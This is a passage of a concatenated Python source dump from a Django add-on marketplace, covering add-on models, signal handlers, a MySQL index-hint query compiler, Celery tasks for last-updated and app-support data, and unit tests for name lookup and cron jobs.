        msg_c = []  # For names that were created.
        msg_d = []  # For deletes.
        msg_u = []  # For updates.

        # Normalize locales.
        names = {}
        for locale, name in new_names.iteritems():
            loc = find_language(locale)
            if loc and loc not in names:
                names[loc] = name

        # Null out names no longer in `names` but exist in the database.
        for locale in set(locales) - set(names):
            names[locale] = None

        for locale, name in names.iteritems():
            if locale in locales:
                if not name and locale.lower() == self.default_locale.lower():
                    pass  # We never want to delete the default locale.
                elif not name:  # A deletion.
                    updated_locales[locale] = None
                    msg_d.append(u'"%s" (%s).' % (locales.get(locale), locale))
                elif name != locales[locale]:
                    updated_locales[locale] = name
                    msg_u.append(u'"%s" -> "%s" (%s).' % (
                        locales[locale], name, locale))
            else:
                updated_locales[locale] = names.get(locale)
                msg_c.append(u'"%s" (%s).' % (name, locale))

        # Only assign when something actually changed (assignment triggers
        # translation machinery on save).
        if locales != updated_locales:
            self.name = updated_locales

        return {
            'added': ' '.join(msg_c),
            'deleted': ' '.join(msg_d),
            'updated': ' '.join(msg_u),
        }
    def update_default_locale(self, locale):
        """
        Updates default_locale if it's different and matches one of our
        supported locales.

        Returns tuple of (old_locale, new_locale) if updated. Otherwise None.
        """
        old_locale = self.default_locale
        locale = find_language(locale)
        if locale and locale != old_locale:
            self.update(default_locale=locale)
            return old_locale, locale
        return None

    @property
    def app_type(self):
        # Not implemented for non-webapps.
        return ''

    def check_ownership(self, request, require_owner, require_author,
                        ignore_disabled, admin):
        """
        Used by acl.check_ownership to see if request.user has permissions for
        the addon.
        """
        # "Author" access is broader than "owner": any role counts, disabled
        # add-ons are still visible, and admin override is not needed.
        if require_author:
            require_owner = False
            ignore_disabled = True
            admin = False
        return acl.check_addon_ownership(request, self, admin=admin,
                                         viewer=(not require_owner),
                                         ignore_disabled=ignore_disabled)
# Keep Addon's translated fields synced to the translations table on save.
dbsignals.pre_save.connect(save_signal, sender=Addon,
                           dispatch_uid='addon_translations')
class AddonDeviceType(amo.models.ModelBase):
    """M2M row tying an add-on (webapp) to a supported device type."""
    addon = models.ForeignKey(Addon, db_constraint=False)
    device_type = models.PositiveIntegerField(
        default=amo.DEVICE_DESKTOP, choices=do_dictsort(amo.DEVICE_TYPES),
        db_index=True)

    class Meta:
        db_table = 'addons_devicetypes'
        unique_together = ('addon', 'device_type')

    def __unicode__(self):
        return u'%s: %s' % (self.addon.name, self.device.name)

    @property
    def device(self):
        # The device constant object for the stored device_type id.
        return amo.DEVICE_TYPES[self.device_type]
@receiver(signals.version_changed, dispatch_uid='version_changed')
def version_changed(sender, **kw):
    """Kick off the async version_changed task when a version changes."""
    from . import tasks
    tasks.version_changed.delay(sender.id)
@Addon.on_change
def watch_status(old_attr={}, new_attr={}, instance=None,
                 sender=None, **kw):
    """Set nomination date if self.status asks for full review.

    The nomination date will only be set when the status of the addon changes.
    The nomination date cannot be reset, say, when a developer cancels their
    request for full review and re-requests full review.

    If a version is rejected after nomination, the developer has to upload a
    new version.
    """
    new_status = new_attr.get('status')
    if not new_status:
        return
    addon = instance
    stati = (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED)
    if new_status in stati and old_attr['status'] != new_status:
        try:
            latest = addon.versions.latest()
            # Never overwrite an existing nomination date.
            if not latest.nomination:
                latest.update(nomination=datetime.now())
        except Version.DoesNotExist:
            pass
@Addon.on_change
def watch_disabled(old_attr={}, new_attr={}, instance=None, sender=None, **kw):
    """Move files in/out of the disabled directory when disabled flips."""
    # Build a throwaway Addon carrying the OLD values to compare disabled
    # state before and after the change.
    attrs = dict((k, v) for k, v in old_attr.items()
                 if k in ('disabled_by_user', 'status'))
    if Addon(**attrs).is_disabled and not instance.is_disabled:
        # Re-enabled: move files back to their public location.
        for f in File.objects.filter(version__addon=instance.id):
            f.unhide_disabled_file()
    if instance.is_disabled and not Addon(**attrs).is_disabled:
        # Newly disabled: hide the files.
        for f in File.objects.filter(version__addon=instance.id):
            f.hide_disabled_file()
def attach_devices(addons):
    """Attach a ``device_ids`` list to every webapp in ``addons``."""
    webapps = dict((a.id, a) for a in addons if a.type == amo.ADDON_WEBAPP)
    rows = (AddonDeviceType.objects.filter(addon__in=webapps)
            .values_list('addon', 'device_type'))
    for addon_id, pairs in sorted_groupby(rows, lambda row: row[0]):
        webapps[addon_id].device_ids = [pair[1] for pair in pairs]
def attach_prices(addons):
    """Attach a ``price`` attribute to every premium add-on in ``addons``."""
    by_id = dict((a.id, a) for a in addons)
    rows = (AddonPremium.objects
            .filter(addon__in=by_id,
                    addon__premium_type__in=amo.ADDON_PREMIUMS)
            .values_list('addon', 'price__price'))
    for addon_id, price in rows:
        by_id[addon_id].price = price
def attach_categories(addons):
    """Put all of the add-on's categories into a category_ids list."""
    by_id = dict((a.id, a) for a in addons)
    rows = (Category.objects.filter(addoncategory__addon__in=by_id)
            .values_list('addoncategory__addon', 'id'))
    for addon_id, pairs in sorted_groupby(rows, lambda row: row[0]):
        by_id[addon_id].category_ids = [pair[1] for pair in pairs]
def attach_translations(addons):
    """Put all translations into a translations dict."""
    attach_trans_dict(Addon, addons)
def attach_tags(addons):
    """Attach a ``tag_list`` of tag texts to every add-on in ``addons``."""
    by_id = dict((a.id, a) for a in addons)
    rows = (Tag.objects.not_blacklisted().filter(addons__in=by_id)
            .values_list('addons__id', 'tag_text'))
    for addon_id, tag_rows in sorted_groupby(rows, lambda row: row[0]):
        by_id[addon_id].tag_list = [row[1] for row in tag_rows]
class AddonCategory(caching.CachingMixin, models.Model):
    """Through model linking an Addon to a Category."""
    addon = models.ForeignKey(Addon)
    category = models.ForeignKey('Category')
    # Whether the add-on is featured within this category.
    feature = models.BooleanField(default=False)
    # Comma-separated locales the feature applies to ('' means all).
    feature_locales = models.CharField(max_length=255, default='', null=True)

    objects = caching.CachingManager()

    class Meta:
        db_table = 'addons_categories'
        unique_together = ('addon', 'category')

    def flush_urls(self):
        """URL patterns to purge from cache when this row changes."""
        urls = ['*/addon/%d/' % self.addon_id,
                '*%s' % self.category.get_url_path(), ]
        return urls
class AddonType(amo.models.ModelBase):
    """Add-on type (extension, theme, ...) with translated labels."""
    name = TranslatedField()
    name_plural = TranslatedField()
    description = TranslatedField()

    class Meta:
        db_table = 'addontypes'

    def __unicode__(self):
        return unicode(self.name)

    def get_url_path(self):
        """Return the browse URL for this type, or None if it has no slug."""
        try:
            # Renamed from `type` to avoid shadowing the builtin.
            type_slug = amo.ADDON_SLUGS[self.id]
        except KeyError:
            return None
        return reverse('browse.%s' % type_slug)
# Keep AddonType's translated fields synced on save.
dbsignals.pre_save.connect(save_signal, sender=AddonType,
                           dispatch_uid='addontype_translations')
class AddonUser(caching.CachingMixin, models.Model):
    """Authorship row linking a user to an add-on with a role."""
    addon = models.ForeignKey(Addon)
    user = UserForeignKey()
    role = models.SmallIntegerField(default=amo.AUTHOR_ROLE_OWNER,
                                    choices=amo.AUTHOR_CHOICES)
    # Whether the author is shown publicly on the add-on's page.
    listed = models.BooleanField(_(u'Listed'), default=True)
    position = models.IntegerField(default=0)

    objects = caching.CachingManager()

    def __init__(self, *args, **kwargs):
        super(AddonUser, self).__init__(*args, **kwargs)
        # Remember original values so post-save handlers can detect changes.
        self._original_role = self.role
        self._original_user_id = self.user_id

    class Meta:
        db_table = 'addons_users'

    def flush_urls(self):
        """URLs to purge: both the add-on's and the user's."""
        return self.addon.flush_urls() + self.user.flush_urls()
class Category(amo.models.OnChangeMixin, amo.models.ModelBase):
    """A browsing category, scoped by add-on type and (optionally) app."""
    name = TranslatedField()
    slug = amo.models.SlugField(max_length=50,
                                help_text='Used in Category URLs.')
    type = models.PositiveIntegerField(db_column='addontype_id',
                                       choices=do_dictsort(amo.ADDON_TYPE))
    application = models.ForeignKey('applications.Application', null=True,
                                    blank=True)
    # Denormalized add-on count for display/sorting.
    count = models.IntegerField('Addon count', default=0)
    weight = models.IntegerField(
        default=0, help_text='Category weight used in sort ordering')
    # Catch-all "miscellaneous" bucket flag.
    misc = models.BooleanField(default=False)

    addons = models.ManyToManyField(Addon, through='AddonCategory')

    class Meta:
        db_table = 'categories'
        verbose_name_plural = 'Categories'

    def __unicode__(self):
        return unicode(self.name)

    def flush_urls(self):
        """URL patterns to purge from cache when the category changes."""
        urls = ['*%s' % self.get_url_path(), ]
        return urls

    def get_url_path(self):
        return '/search?cat=%s' % self.slug

    @staticmethod
    def transformer(addons):
        """Bulk-attach all_categories to each add-on in one query."""
        qs = (Category.objects.no_cache().filter(addons__in=addons)
              .extra(select={'addon_id': 'addons_categories.addon_id'}))
        cats = dict((addon_id, list(cs))
                    for addon_id, cs in sorted_groupby(qs, 'addon_id'))
        for addon in addons:
            addon.all_categories = cats.get(addon.id, [])

    def clean(self):
        # All-numeric slugs would collide with id-based URL routing.
        if self.slug.isdigit():
            raise ValidationError('Slugs cannot be all numbers.')
@Category.on_change
def reindex_cat_slug(old_attr=None, new_attr=None, instance=None,
                     sender=None, **kw):
    """ES reindex category's apps if category slug changes."""
    from mkt.webapps.tasks import index_webapps

    # Only webapp categories are indexed in ES.
    if new_attr.get('type') != amo.ADDON_WEBAPP:
        instance.save()
        return
    # Detect the slug change before saving, then reindex afterwards.
    slug_changed = (instance.pk is not None and old_attr and new_attr and
                    old_attr.get('slug') != new_attr.get('slug'))
    instance.save()
    if slug_changed:
        index_webapps(list(instance.addon_set.filter(type=amo.ADDON_WEBAPP)
                           .values_list('id', flat=True)))
# Keep Category's translated fields synced on save.
dbsignals.pre_save.connect(save_signal, sender=Category,
                           dispatch_uid='category_translations')
class Feature(amo.models.ModelBase):
    """A time-boxed featuring of an add-on for an application/locale."""
    addon = models.ForeignKey(Addon)
    start = models.DateTimeField()
    end = models.DateTimeField()
    # Locale the featuring applies to ('' / NULL means all locales).
    locale = models.CharField(max_length=10, default='', blank=True, null=True)
    application = models.ForeignKey('applications.Application')

    class Meta:
        db_table = 'features'

    def __unicode__(self):
        app = amo.APP_IDS[self.application.id].pretty
        return '%s (%s: %s)' % (self.addon.name, app, self.locale)
class Preview(amo.models.ModelBase):
    """A screenshot/preview image (plus generated thumbnail) for an add-on."""
    addon = models.ForeignKey(Addon, related_name='previews')
    # MIME types of the full image and its thumbnail.
    filetype = models.CharField(max_length=25)
    thumbtype = models.CharField(max_length=25)
    caption = TranslatedField()
    # Display order; position == -1 marks promo graphics (see get_previews).
    position = models.IntegerField(default=0)
    # {'image': [w, h], 'thumbnail': [w, h]} pixel dimensions.
    sizes = json_field.JSONField(max_length=25, default={})

    class Meta:
        db_table = 'previews'
        ordering = ('position', 'created')

    def flush_urls(self):
        """URLs to purge from cache when this preview changes."""
        urls = ['*/addon/%d/' % self.addon_id,
                self.thumbnail_url,
                self.image_url, ]
        return urls

    def _image_url(self, url_template):
        # Cache-bust with the modification timestamp.
        if self.modified is not None:
            modified = int(time.mktime(self.modified.timetuple()))
        else:
            modified = 0
        # Images are sharded into directories of 1000 by id.
        args = [self.id / 1000, self.id, modified]
        if '.png' not in url_template:
            args.insert(2, self.file_extension)
        return url_template % tuple(args)

    def _image_path(self, url_template):
        args = [self.id / 1000, self.id]
        if '.png' not in url_template:
            args.append(self.file_extension)
        return url_template % tuple(args)

    def as_dict(self, src=None):
        """Serialize to a dict of URLs + caption; `src` is a tracking param."""
        d = {'full': urlparams(self.image_url, src=src),
             'thumbnail': urlparams(self.thumbnail_url, src=src),
             'caption': unicode(self.caption)}
        return d

    @property
    def is_landscape(self):
        """True if the full image is wider than it is tall."""
        size = self.image_size
        if not size:
            return False
        return size[0] > size[1]

    @property
    def file_extension(self):
        # Assume that blank is an image.
        if not self.filetype:
            return 'png'
        return self.filetype.split('/')[1]

    @property
    def thumbnail_url(self):
        return self._image_url(settings.PREVIEW_THUMBNAIL_URL)

    @property
    def image_url(self):
        return self._image_url(settings.PREVIEW_FULL_URL)

    @property
    def thumbnail_path(self):
        return self._image_path(settings.PREVIEW_THUMBNAIL_PATH)

    @property
    def image_path(self):
        return self._image_path(settings.PREVIEW_FULL_PATH)

    @property
    def thumbnail_size(self):
        return self.sizes.get('thumbnail', []) if self.sizes else []

    @property
    def image_size(self):
        return self.sizes.get('image', []) if self.sizes else []
# Keep Preview's translated caption synced on save.
dbsignals.pre_save.connect(save_signal, sender=Preview,
                           dispatch_uid='preview_translations')
class AppSupport(amo.models.ModelBase):
    """Cache to tell us if an add-on's current version supports an app."""
    addon = models.ForeignKey(Addon)
    app = models.ForeignKey('applications.Application')
    # Supported app-version range as version_int values.
    min = models.BigIntegerField("Minimum app version", null=True)
    max = models.BigIntegerField("Maximum app version", null=True)

    class Meta:
        db_table = 'appsupport'
        unique_together = ('addon', 'app')
class Charity(amo.models.ModelBase):
    """A charity that can receive an add-on's contributions."""
    name = models.CharField(max_length=255)
    url = models.URLField()
    # PayPal account receiving the contributions.
    paypal = models.CharField(max_length=255)

    class Meta:
        db_table = 'charities'

    @property
    def outgoing_url(self):
        # The Mozilla Foundation link is trusted and not bounced.
        if self.pk == amo.FOUNDATION_ORG:
            return self.url
        return get_outgoing_url(unicode(self.url))
class BlacklistedSlug(amo.models.ModelBase):
    """Slugs that add-ons may never use."""
    name = models.CharField(max_length=255, unique=True, default='')

    class Meta:
        db_table = 'addons_blacklistedslug'

    def __unicode__(self):
        return self.name

    @classmethod
    def blocked(cls, slug):
        """True if `slug` is numeric (reserved for ids) or blacklisted."""
        return slug.isdigit() or cls.objects.filter(name=slug).exists()
class AddonUpsell(amo.models.ModelBase):
    """Link from a free add-on to the premium add-on it upsells to."""
    free = models.ForeignKey(Addon, related_name='_upsell_from')
    premium = models.ForeignKey(Addon, related_name='_upsell_to')

    class Meta:
        db_table = 'addon_upsell'
        unique_together = ('free', 'premium')

    def __unicode__(self):
        return u'Free: %s to Premium: %s' % (self.free, self.premium)

    @amo.cached_property
    def premium_addon(self):
        """
        Return the premium version, or None if there isn't one.
        """
        try:
            return self.premium
        except Addon.DoesNotExist:
            pass

    def cleanup(self):
        """Delete this upsell if either end no longer exists."""
        try:
            # Just accessing these may raise an error.
            assert self.free and self.premium
        except ObjectDoesNotExist:
            log.info('Deleted upsell: from %s, to %s' %
                     (self.free_id, self.premium_id))
            self.delete()
def cleanup_upsell(sender, instance, **kw):
    """post_delete handler: drop upsell rows referencing a deleted add-on."""
    # Skip fixture loading ('raw' saves).
    if 'raw' in kw:
        return
    involving = Q(free=instance) | Q(premium=instance)
    for upsell in list(AddonUpsell.objects.filter(involving)):
        upsell.cleanup()
dbsignals.post_delete.connect(cleanup_upsell, sender=Addon,
dispatch_uid='addon_upsell')
# webapps.models imports addons.models to get Addon, so we need to keep the
# Webapp import down here.
from mkt.webapps.models import Webapp
########NEW FILE########
__FILENAME__ = query
from django.db import models
from django.db.models.sql import compiler
import caching.base as caching
class IndexQuerySet(caching.CachingQuerySet):
    """CachingQuerySet that can force MySQL index hints into the SQL."""

    def with_index(self, **kw):
        """
        Suggest indexes that should be used with this query as key-value pairs.

        qs.with_index(t1='xxx') => INNER JOIN t1 USE INDEX (`xxx`)
        """
        q = self._clone()
        # Swap in the IndexQuery subclass the first time a hint is added.
        if not isinstance(q.query, IndexQuery):
            q.query = self.query.clone(IndexQuery)
        q.query.index_map.update(kw)
        return q

    def fetch_missed(self, pks):
        """Fetch cache misses by pk, temporarily dropping index hints."""
        # Remove the indexes before doing the id query.
        if hasattr(self.query, 'index_map'):
            index_map = self.query.index_map
            self.query.index_map = {}
            rv = super(IndexQuerySet, self).fetch_missed(pks)
            self.query.index_map = index_map
            return rv
        else:
            return super(IndexQuerySet, self).fetch_missed(pks)
class IndexQuery(models.query.sql.Query):
    """
    Extends sql.Query to make it possible to specify indexes to use.
    """

    def clone(self, klass=None, **kwargs):
        # Maintain index_map across clones.
        c = super(IndexQuery, self).clone(klass, **kwargs)
        c.index_map = dict(self.index_map)
        return c

    def get_compiler(self, using=None, connection=None):
        """Return an IndexCompiler so hints are rendered into the SQL."""
        # Call super to figure out using and connection.
        c = super(IndexQuery, self).get_compiler(using, connection)
        return IndexCompiler(self, c.connection, c.using)

    def _setup_query(self):
        # Lazily create the table -> index-name map.
        if not hasattr(self, 'index_map'):
            self.index_map = {}

    def get_count(self, using):
        # Don't use the index for counts, it's slower.
        index_map = self.index_map
        self.index_map = {}
        count = super(IndexQuery, self).get_count(using)
        self.index_map = index_map
        return count
class IndexCompiler(compiler.SQLCompiler):
    """SQLCompiler that injects USE INDEX hints from query.index_map."""

    def get_from_clause(self):
        """
        Returns a list of strings that are joined together to go after the
        "FROM" part of the query, as well as a list any extra parameters that
        need to be included. Sub-classes, can override this to create a
        from-clause via a "select".

        This should only be called after any SQL construction methods that
        might change the tables we need. This means the select columns and
        ordering must be done first.
        """
        result = []
        qn = self.quote_name_unless_alias
        qn2 = self.connection.ops.quote_name
        index_map = self.query.index_map
        first = True
        from_params = []
        for alias in self.query.tables:
            if not self.query.alias_refcount[alias]:
                continue
            try:
                name, alias, join_type, lhs, join_cols, _, join_field = self.query.alias_map[alias]
            except KeyError:
                # Extra tables can end up in self.tables, but not in the
                # alias_map if they aren't in a join. That's OK. We skip them.
                continue
            # Fixed: ternary instead of the fragile and-or idiom.
            alias_str = ' %s' % alias if alias != name else ''
            ### jbalogh wuz here. ###
            if name in index_map:
                use_index = 'USE INDEX (%s)' % qn(index_map[name])
            else:
                use_index = ''
            if join_type and not first:
                extra_cond = join_field.get_extra_restriction(
                    self.query.where_class, alias, lhs)
                if extra_cond:
                    extra_sql, extra_params = extra_cond.as_sql(
                        qn, self.connection)
                    extra_sql = 'AND (%s)' % extra_sql
                    from_params.extend(extra_params)
                else:
                    extra_sql = ""
                result.append('%s %s%s %s ON ('
                              % (join_type, qn(name), alias_str, use_index))
                for index, (lhs_col, rhs_col) in enumerate(join_cols):
                    if index != 0:
                        result.append(' AND ')
                    result.append('%s.%s = %s.%s' %
                                  (qn(lhs), qn2(lhs_col), qn(alias), qn2(rhs_col)))
                result.append('%s)' % extra_sql)
            else:
                # Fixed: the original had a duplicated `connector =`
                # assignment here.
                connector = '' if first else ', '
                result.append('%s%s%s %s' % (connector, qn(name), alias_str, use_index))
            ### jbalogh out. ###
            first = False
        for t in self.query.extra_tables:
            alias, unused = self.query.table_alias(t)
            # Only add the alias if it's not already present (the table_alias()
            # calls increments the refcount, so an alias refcount of one means
            # this is the only reference.
            if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
                connector = ', ' if not first else ''
                result.append('%s%s' % (connector, qn(alias)))
                first = False
        return result, from_params
########NEW FILE########
__FILENAME__ = signals
import django.dispatch
version_changed = django.dispatch.Signal()
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.core.files.storage import default_storage as storage
from django.db import connection, transaction
from celeryutils import task
import amo
from amo.decorators import write
# pulling tasks from cron
from . import cron # NOQA
from .models import Addon, Preview
log = logging.getLogger('z.task')
@task
@write
def version_changed(addon_id, **kw):
    """Celery task: refresh last_updated and appsupport for an add-on."""
    update_last_updated(addon_id)
    update_appsupport([addon_id])
def update_last_updated(addon_id):
    """Recompute and store a single add-on's last_updated value."""
    queries = Addon._last_updated_queries()
    try:
        addon = Addon.objects.get(pk=addon_id)
    except Addon.DoesNotExist:
        log.info('[1@None] Updating last updated for %s failed, no addon found'
                 % addon_id)
        return

    log.info('[1@None] Updating last updated for %s.' % addon_id)

    # Pick the query matching the add-on's type/status (see
    # Addon._last_updated_queries).
    if addon.is_webapp():
        q = 'webapps'
    elif addon.status == amo.STATUS_PUBLIC:
        q = 'public'
    else:
        q = 'exp'
    qs = queries[q].filter(pk=addon_id).using('default')
    res = qs.values_list('id', 'last_updated')
    if res:
        pk, t = res[0]
        Addon.objects.filter(pk=pk).update(last_updated=t)
@transaction.commit_on_success
def update_appsupport(ids):
    """Rebuild the appsupport cache rows for the given add-on ids.

    Deletes existing rows and bulk-inserts the (addon, app, min, max)
    version ranges derived from each add-on's compatible_apps.
    """
    log.info("[%s@None] Updating appsupport for %s." % (len(ids), ids))
    delete = 'DELETE FROM appsupport WHERE addon_id IN (%s)'
    insert = """INSERT INTO appsupport
                    (addon_id, app_id, min, max, created, modified)
                VALUES %s"""

    addons = Addon.objects.no_cache().filter(id__in=ids).no_transforms()
    apps = []
    for addon in addons:
        for app, appver in addon.compatible_apps.items():
            if appver is None:
                # Fake support for all version ranges.
                min_, max_ = 0, 999999999999999999
            else:
                min_, max_ = appver.min.version_int, appver.max.version_int
            apps.append((addon.id, app.id, min_, max_))

    # Fixed: bail out *before* building the VALUES string (the original
    # constructed it first, wasting work when there was nothing to insert).
    if not apps:
        return

    values = ','.join('(%s, %s, %s, %s, NOW(), NOW())' % x for x in apps)
    cursor = connection.cursor()
    cursor.execute(delete % ','.join(map(str, ids)))
    cursor.execute(insert % values)

    # All our updates were sql, so invalidate manually.
    Addon.objects.invalidate(*addons)
@task
def delete_preview_files(id, **kw):
    """Celery task: remove a preview's thumbnail and full image from storage.

    Best-effort: storage errors are logged, not raised.
    """
    log.info('[1@None] Removing preview with id of %s.' % id)

    # An unsaved Preview is enough to compute the storage paths from the id.
    p = Preview(id=id)
    for f in (p.thumbnail_path, p.image_path):
        try:
            storage.delete(f)
        except Exception, e:
            log.error('Error deleting preview file (%s): %s' % (f, e))
########NEW FILE########
__FILENAME__ = test_addon_utils
from nose.tools import eq_
import amo.tests
from addons.models import Addon
from addons.utils import reverse_name_lookup
class TestReverseNameLookup(amo.tests.TestCase):
    """Tests for the name -> addon-id reverse lookup cache."""
    fixtures = ('base/addon_3615',)

    def setUp(self):
        super(TestReverseNameLookup, self).setUp()
        self.addon = Addon.objects.get()

    def test_delete_addon(self):
        # Deleting an add-on must drop its name from the lookup.
        eq_(reverse_name_lookup('Delicious Bookmarks'), 3615)
        self.addon.delete('farewell my sweet amo, it was a good run')
        eq_(reverse_name_lookup('Delicious Bookmarks'), None)

    def test_update_addon(self):
        # Renaming must move the lookup to the new name.
        eq_(reverse_name_lookup('Delicious Bookmarks'), 3615)
        self.addon.name = 'boo'
        self.addon.save()
        eq_(reverse_name_lookup('Delicious Bookmarks'), None)
        eq_(reverse_name_lookup('boo'), 3615)

    def test_get_strip(self):
        # Lookup ignores surrounding whitespace.
        eq_(reverse_name_lookup('Delicious Bookmarks   '), 3615)

    def test_get_case(self):
        # Lookup is case-insensitive.
        eq_(reverse_name_lookup('delicious bookmarks'), 3615)

    def test_addon_and_app_namespaces(self):
        # Add-ons and webapps live in separate name namespaces.
        eq_(reverse_name_lookup('Delicious Bookmarks', webapp=False), 3615)
        eq_(reverse_name_lookup('Delicious Bookmarks', webapp=True), None)

        # Note: The factory creates the app which calls the reverse_name_lookup
        # in a post_save signal, so no need to call it explicitly here.
        app = amo.tests.addon_factory(type=amo.ADDON_WEBAPP)
        self.assertTrue(app.is_webapp())
        eq_(reverse_name_lookup(app.name, webapp=False), None)
        eq_(reverse_name_lookup(app.name, webapp=True), app.id)

        # Show we can also create an app with the same name as an addon
        name = 'Delicious Bookmarks'
        app = amo.tests.addon_factory(name=name, type=amo.ADDON_WEBAPP)
        self.assertTrue(app.is_webapp())
        eq_(reverse_name_lookup(name, webapp=False), 3615)
        eq_(reverse_name_lookup(name, webapp=True), app.id)
########NEW FILE########
__FILENAME__ = test_cron
import mock
from nose.tools import eq_
import amo
import amo.tests
from addons import cron
from addons.models import Addon, AppSupport
from files.models import File, Platform
from versions.models import Version
class CurrentVersionTestCase(amo.tests.TestCase):
    """Tests for the cron that backfills Addon._current_version."""
    fixtures = ['base/addon_3615']

    @mock.patch('waffle.switch_is_active', lambda x: True)
    def test_addons(self):
        # The private helper fixes a nulled-out _current_version.
        Addon.objects.filter(pk=3615).update(_current_version=None)
        eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 1)
        cron._update_addons_current_version(((3615,),))
        eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 0)

    @mock.patch('waffle.switch_is_active', lambda x: True)
    def test_cron(self):
        # The public cron entry point does the same across all add-ons.
        Addon.objects.filter(pk=3615).update(_current_version=None)
        eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 1)
        cron.update_addons_current_version()
        eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 0)
class TestLastUpdated(amo.tests.TestCase):
    """Tests for the addon_last_updated cron and the appsupport rebuild."""
    fixtures = ['base/addon_3615', 'addons/listed', 'base/apps',
                'base/seamonkey', 'base/thunderbird']

    def test_catchall(self):
        """Make sure the catch-all last_updated is stable and accurate."""
        # Nullify all datestatuschanged so the public add-ons hit the
        # catch-all.
        (File.objects.filter(status=amo.STATUS_PUBLIC)
         .update(datestatuschanged=None))
        Addon.objects.update(last_updated=None)
        cron.addon_last_updated()
        for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC,
                                          type=amo.ADDON_EXTENSION):
            eq_(addon.last_updated, addon.created)

        # Make sure it's stable.
        cron.addon_last_updated()
        for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC):
            eq_(addon.last_updated, addon.created)

    def test_last_updated_lite(self):
        # Make sure lite addons' last_updated matches their file's
        # datestatuschanged.
        Addon.objects.update(status=amo.STATUS_LITE, last_updated=None)
        File.objects.update(status=amo.STATUS_LITE)
        cron.addon_last_updated()
        addon = Addon.objects.get(id=3615)
        files = File.objects.filter(version__addon=addon)
        eq_(len(files), 1)
        eq_(addon.last_updated, files[0].datestatuschanged)
        assert addon.last_updated

    def test_last_update_lite_no_files(self):
        # With no LITE files, last_updated falls back to the creation date.
        Addon.objects.update(status=amo.STATUS_LITE, last_updated=None)
        File.objects.update(status=amo.STATUS_UNREVIEWED)
        cron.addon_last_updated()
        addon = Addon.objects.get(id=3615)
        eq_(addon.last_updated, addon.created)
        assert addon.last_updated

    def test_appsupport(self):
        ids = Addon.objects.values_list('id', flat=True)
        cron._update_appsupport(ids)
        eq_(AppSupport.objects.filter(app=amo.FIREFOX.id).count(), 4)

        # Run it again to test deletes.
        cron._update_appsupport(ids)
        eq_(AppSupport.objects.filter(app=amo.FIREFOX.id).count(), 4)

    def test_appsupport_listed(self):
        # Unlisted add-ons don't get appsupport rows.
        AppSupport.objects.all().delete()
        eq_(AppSupport.objects.filter(addon=3723).count(), 0)
        cron.update_addon_appsupport()
        eq_(AppSupport.objects.filter(addon=3723,
                                      app=amo.FIREFOX.id).count(), 0)

    def test_appsupport_seamonkey(self):
        # Public SeaMonkey add-ons do get an appsupport row.
        addon = Addon.objects.get(pk=15663)
        addon.update(status=amo.STATUS_PUBLIC)
        AppSupport.objects.all().delete()
        cron.update_addon_appsupport()
        eq_(AppSupport.objects.filter(addon=15663,
                                      app=amo.SEAMONKEY.id).count(), 1)
class TestHideDisabledFiles(amo.tests.TestCase):
    """Tests for cron.hide_disabled_files moving files to guarded storage."""
    msg = 'Moving disabled file: %s => %s'
    def setUp(self):
        # One addon with a single version carrying two files (f1, f2).
        self.p = Platform.objects.create(id=amo.PLATFORM_ALL.id)
        self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        self.version = Version.objects.create(addon=self.addon)
        self.f1 = File.objects.create(version=self.version, platform=self.p,
                                      filename='f1')
        self.f2 = File.objects.create(version=self.version, filename='f2',
                                      platform=self.p)
    @mock.patch('files.models.os')
    def test_leave_nondisabled_files(self, os_mock):
        # All these addon/file status pairs should stay.
        stati = [(amo.STATUS_PUBLIC, amo.STATUS_PUBLIC),
                 (amo.STATUS_PUBLIC, amo.STATUS_UNREVIEWED),
                 (amo.STATUS_PUBLIC, amo.STATUS_BETA),
                 (amo.STATUS_LITE, amo.STATUS_UNREVIEWED),
                 (amo.STATUS_LITE, amo.STATUS_LITE),
                 (amo.STATUS_LITE_AND_NOMINATED, amo.STATUS_UNREVIEWED),
                 (amo.STATUS_LITE_AND_NOMINATED, amo.STATUS_LITE)]
        for addon_status, file_status in stati:
            self.addon.update(status=addon_status)
            File.objects.update(status=file_status)
            cron.hide_disabled_files()
            # If no filesystem check happened, no move was attempted.
            assert not os_mock.path.exists.called, (addon_status, file_status)
    # Decorators apply bottom-up: storage -> m_storage, File.mv -> mv_mock.
    @mock.patch('files.models.File.mv')
    @mock.patch('files.models.storage')
    def test_move_user_disabled_addon(self, m_storage, mv_mock):
        """User-disabled addons have every file moved to guarded storage."""
        # Use Addon.objects.update so the signal handler isn't called.
        Addon.objects.filter(id=self.addon.id).update(
            status=amo.STATUS_PUBLIC, disabled_by_user=True)
        File.objects.update(status=amo.STATUS_PUBLIC)
        cron.hide_disabled_files()
        # Check that f2 was moved.
        f2 = self.f2
        mv_mock.assert_called_with(f2.file_path, f2.guarded_file_path,
                                   self.msg)
        # Check that f1 was moved as well.
        f1 = self.f1
        # Rewind the mocks to their first recorded call to assert on f1.
        mv_mock.call_args = mv_mock.call_args_list[0]
        m_storage.delete.call_args = m_storage.delete.call_args_list[0]
        mv_mock.assert_called_with(f1.file_path, f1.guarded_file_path,
                                   self.msg)
        # There's only 2 files, both should have been moved.
        eq_(mv_mock.call_count, 2)
        eq_(m_storage.delete.call_count, 2)
    @mock.patch('files.models.File.mv')
    @mock.patch('files.models.storage')
    def test_move_admin_disabled_addon(self, m_storage, mv_mock):
        """Admin-disabled addons behave like user-disabled ones."""
        Addon.objects.filter(id=self.addon.id).update(
            status=amo.STATUS_DISABLED)
        File.objects.update(status=amo.STATUS_PUBLIC)
        cron.hide_disabled_files()
        # Check that f2 was moved.
        f2 = self.f2
        mv_mock.assert_called_with(f2.file_path, f2.guarded_file_path,
                                   self.msg)
        # Check that f1 was moved as well.
        f1 = self.f1
        mv_mock.call_args = mv_mock.call_args_list[0]
        m_storage.delete.call_args = m_storage.delete.call_args_list[0]
        mv_mock.assert_called_with(f1.file_path, f1.guarded_file_path,
                                   self.msg)
        # There's only 2 files, both should have been moved.
        eq_(mv_mock.call_count, 2)
        eq_(m_storage.delete.call_count, 2)
